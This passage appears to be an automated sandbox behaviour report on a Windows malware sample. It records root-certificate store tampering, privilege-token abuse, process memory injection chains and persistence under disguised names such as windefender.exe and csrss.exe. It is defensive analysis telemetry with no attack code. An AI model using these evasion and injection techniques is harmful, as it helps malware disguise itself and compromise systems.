Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-232 = "Hawaiian Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-551 = "North Asia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a441400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a319000000010000001000000014c3bd3549ee225aece13734ad8ca0b82000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeDebugPrivilege N/A C:\containerProviderhost\runtimenetSvc.exe N/A
Token: SeDebugPrivilege N/A C:\containerProviderhost\services.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1256 wrote to memory of 2884 N/A N/A C:\Windows\system32\cmd.exe
PID 1256 wrote to memory of 2884 N/A N/A C:\Windows\system32\cmd.exe
PID 1256 wrote to memory of 2884 N/A N/A C:\Windows\system32\cmd.exe
PID 2884 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2884 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2884 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1256 wrote to memory of 2648 N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 1256 wrote to memory of 2648 N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 1256 wrote to memory of 2648 N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 1256 wrote to memory of 2648 N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2648 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2940 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Windows\SysWOW64\icacls.exe
PID 2940 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Windows\SysWOW64\icacls.exe
PID 2940 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Windows\SysWOW64\icacls.exe
PID 2940 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Windows\SysWOW64\icacls.exe
PID 2940 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2940 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2940 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2940 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 2972 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\Temp\84BB.exe
PID 1952 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 1952 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 1952 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 1952 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 2244 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe
PID 1952 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe
PID 1952 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe
PID 1952 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe
PID 1952 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe
PID 788 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe
PID 788 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe
PID 788 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe
